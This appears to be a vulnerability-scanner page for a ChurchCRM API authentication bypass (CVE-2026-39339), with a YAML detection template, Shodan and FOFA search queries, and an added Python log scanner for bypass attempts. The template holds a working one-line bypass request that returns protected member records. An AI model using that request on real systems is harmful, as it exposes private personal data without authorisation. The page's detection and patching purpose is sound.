ChurchCRM - API Authentication Bypass via URL Injection
CVE-2026-39339
Verified
Description
ChurchCRM < 7.1.0 contains an authentication bypass caused by improper API middleware URL handling in ChurchCRM/Slim/Middleware/AuthMiddleware.php, letting unauthenticated attackers access protected API endpoints; the exploit requires a crafted request URL with 'api/public
Severity
Critical
CVSS Score
9.1
Exploit Probability
19%
Affected Product
churchcrm
Published Date
April 17, 2026
Template Author
akhilshekhar
CVE-2026-39339.yaml
id: CVE-2026-39339

info:
  name: ChurchCRM - API Authentication Bypass via URL Injection
  author: akhilshekhar
  severity: critical
  description: |
    ChurchCRM < 7.1.0 contains an authentication bypass caused by improper API middleware URL handling in ChurchCRM/Slim/Middleware/AuthMiddleware.php, letting unauthenticated attackers access protected API endpoints, exploit requires crafted request URL with 'api/public
  impact: |
    Unauthenticated attackers can access all protected API endpoints, exposing sensitive church member data and system information.
  remediation: |
    Update to version 7.1.0 or later.
  reference:
    - https://github.com/ChurchCRM/CRM/security/advisories/GHSA-v3p2-mx78-pxhc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-39339
    epss-score: 0.19066
    epss-percentile: 0.95422
    cwe-id: CWE-284
    cpe: cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*
  metadata:
    vendor: churchcrm
    product: churchcrm
    shodan-query: http.title:"churchcrm"
    fofa-query: app="churchcrm"
  tags: cve,cve2026,churchcrm,auth-bypass

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/persons/latest?bypass=/api/public"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PersonId"
          - "FormattedName"
          - "\"people\""
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ea2690c5797f00fa03347f75d3e670baec5b1c204a0427d7649e2dcacd3909a602210090a18281018deff37600abd6508d5dd39e34dc333149be2bb5ff4c2be44b3168:922c64590222798bb761d5b6d8e72950
Score: 9.1
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
CVE ID:
CVE-2026-39339
CWE ID:
CWE-284
Remediation Steps
Update to version 7.1.0 or later.
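The template above probes a protected /api/ route with 'api/public' smuggled into the query string. The following is an added detection example written for this page, not code from the template author or from ChurchCRM: it scans constructed web-server access-log lines for the same pattern (a non-public /api/ path whose percent-decoded query string contains 'api/public'), which is the heuristic assumed here from the template's request path; a 200 response on such a request indicates an unpatched instance answered it.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (Combined Log Format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Apr/2026:10:00:01 +0000] "GET /api/persons/latest?bypass=/api/public HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.5 - - [17/Apr/2026:10:00:02 +0000] "GET /api/persons/latest HTTP/1.1" 401 58 "-" "curl/8.0"
198.51.100.7 - - [17/Apr/2026:10:00:03 +0000] "GET /api/public/register HTTP/1.1" 200 220 "-" "Mozilla/5.0"
198.51.100.7 - - [17/Apr/2026:10:00:04 +0000] "GET /api/families/latest?x=%2Fapi%2Fpublic HTTP/1.1" 200 4096 "-" "python-requests/2.31"
192.0.2.9 - - [17/Apr/2026:10:00:05 +0000] "GET /Menu.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Minimal Combined Log Format parser: client IP, timestamp, method, URL, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def is_bypass_attempt(url: str) -> bool:
    """True when a protected /api/ path carries 'api/public' in its query string.

    Heuristic assumed from the template's probe path; the path component is
    percent-decoded so encoded variants of the marker are not missed.
    """
    parts = urlsplit(url)
    path = unquote(parts.path)
    if not path.startswith("/api/") or path.startswith("/api/public"):
        return False  # not an API route, or a legitimately public one
    return "api/public" in unquote(parts.query)


def find_bypass_attempts(log_text: str) -> list[dict]:
    """Return one record per log line that matches the bypass pattern."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        if is_bypass_attempt(m["url"]):
            hits.append({"ip": m["ip"], "url": m["url"], "status": int(m["status"])})
    return hits


if __name__ == "__main__":
    for hit in find_bypass_attempts(SAMPLE_LOG):
        print(hit)
```

Run against the constructed log this reports the two /api/ requests carrying the marker (one plain, one percent-encoded) and ignores the legitimate /api/public call and the non-API page.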